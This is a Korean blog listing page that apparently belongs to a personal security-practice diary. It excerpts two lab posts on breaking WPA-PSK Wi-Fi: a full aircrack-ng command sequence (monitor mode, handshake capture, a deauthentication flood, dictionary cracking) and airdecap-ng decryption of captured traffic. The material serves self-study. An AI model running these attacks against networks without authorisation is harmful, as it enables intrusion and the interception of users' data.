티스토리

securitory
검색하기

블로그 홈

securitory

securitory.tistory.com/m

나만의 보안실습 일기

구독자
0
방명록 방문하기

주요 글 목록

  • WPA-PSK 암호문 복호화 개요 앞서 암호를 크랙 해보았다. 이번에는 무선환경에서 암호화되어 송수신되는 암호 패킷을 복호화해보자! 실습환경 웹서버 : http://172.30.1.30:8080 PC : 172.30.1.41 시나리오 : 공격자는 네트워크 보안이 취약한 곳를 찾았고 패킷을 수집 중이다. 얼마 뒤 한 사용자가 이 네트워크에 접속하여 특정 홈페이지에 회원가입을 시도한다. 네트워크 정보 : 사용자 화면 : 과정 1. 4way-handshake을 통한 재인증 패킷 수집(Wifi 패스워드 크래킹 참고) 2. airdecap-ng -p a123456789 /packetD/packets-01.cap -e "KT_GiGA_2G_Wave2_1C49" 패스워드와 캡처된 패킷 그리고 ESSID를 인자로 넣어주자 복호화된 패킷이 만들어졌.. 공감수 0 댓글수 0 2020. 12. 30.
  • WPA-PSK 패스워드 크래킹 개요 해킹의 핵심은 인증이 수행되는 패킷들을 수집하고 여기에 다수의 암호문을 대입! 과정 1. 패킷 캡처를 위한 무차별 모드 활성화 #airmon-ng start wlan0 monitor 2. 네트워크 정보 및 패킷 캡처 #airodump-ng --bssid 88:3C:1C:AE:1C:4D -c 2 -w packets wlan0 3. 재인증 발생 유도 #aireplay-ng --deauth 100 -a 88:3C:1C:AE:1C:4D wlan0 4. 크래킹 #aircrack-ng -b 88:3C:1C:AE:1C:4D -w /packetD/worldlist.txt /packetD/packet-01.cap 실습환경 운영체제 : 칼리리눅스 네트워크 환경 무선랜카드 iptime n150ua 특이사항 암호 앞에 .. 공감수 0 댓글수 0 2020. 12. 29.
    문의안내
    • 티스토리
    • 로그인
    • 고객센터

    티스토리는 카카오에서 사랑을 담아 만듭니다.

    © Kakao Corp.